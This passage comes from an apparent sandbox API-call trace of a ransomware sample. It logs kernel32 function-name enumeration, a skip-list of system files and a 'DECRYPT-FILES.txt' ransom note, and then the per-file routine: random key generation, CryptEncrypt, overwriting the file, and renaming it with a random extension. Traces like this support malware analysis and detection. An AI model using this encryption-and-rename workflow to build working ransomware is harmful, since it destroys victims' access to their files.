lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.040] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.040] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.040] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.040] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.040] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.040] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.040] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.040] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.040] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.040] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.041] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.041] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.041] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.041] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.041] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.041] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.041] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.041] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.041] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.041] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.041] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.041] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.041] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.041] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.041] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.041] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.041] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.041] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.042] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.042] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.042] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.042] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.042] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.042] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.042] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.042] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.042] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.042] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.042] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.042] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.042] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.042] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.042] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.042] lstrlenA (lpString="DELETEATOM") returned 10 [0085.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.042] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.042] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.043] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.043] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.043] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.043] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.043] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.043] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.043] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.043] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.043] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.043] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.043] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.043] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.043] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.043] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.043] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.043] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.043] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.043] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.043] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.044] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.044] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.044] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.044] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.044] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.044] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.044] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.044] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.044] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.044] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.044] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.044] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.044] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.044] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.044] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.044] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.044] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.045] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.045] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.045] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.045] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.045] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 77 [0085.045] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.0xtLF") returned 83 [0085.045] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.0xtLF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.0xtlf"), dwFlags=0x0) returned 1 [0085.046] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.046] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.046] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.046] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0085.046] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="DECRYPT-FILES.txt") returned 1 [0085.046] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="autorun.inf") returned 1 [0085.046] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="boot.ini") returned 1 [0085.046] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="desktop.ini") returned 1 [0085.047] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="ntuser.dat") returned -1 [0085.047] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="iconcache.db") returned 1 [0085.047] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="bootsect.bak") returned 1 [0085.047] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="ntuser.dat.log") returned -1 [0085.047] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="thumbs.db") returned -1 [0085.047] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="Bootfont.bin") returned 1 [0085.047] lstrlenW (lpString="IE site on Microsoft.com.url") returned 28 [0085.047] lstrcmpiW (lpString1="url", lpString2="lnk") returned 1 [0085.047] lstrcmpiW (lpString1="url", lpString2="exe") returned 1 [0085.047] lstrcmpiW (lpString1="url", lpString2="sys") returned 1 [0085.047] lstrcmpiW (lpString1="url", lpString2="dll") returned 1 [0085.047] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned 59 [0085.047] lstrlenW (lpString="IE site on Microsoft.com.url") returned 28 [0085.047] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\" [0085.047] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpString2="IE site on Microsoft.com.url" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" [0085.047] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.047] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0085.050] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=133) returned 1 [0085.050] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0085.050] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.050] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.050] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.050] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.052] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0085.052] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.053] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.053] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.053] CloseHandle (hObject=0x42c) returned 1 [0085.053] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.053] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0085.054] CloseHandle (hObject=0x0) returned 0 [0085.054] CloseHandle (hObject=0x428) returned 1 [0085.054] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.054] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.055] GetTickCount () returned 0x114db90 [0085.055] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.055] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.055] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.055] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.055] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.056] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 87 [0085.056] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.wFb1E8") returned 94 [0085.056] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.wFb1E8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.wfb1e8"), dwFlags=0x0) returned 1 [0085.056] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.056] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, 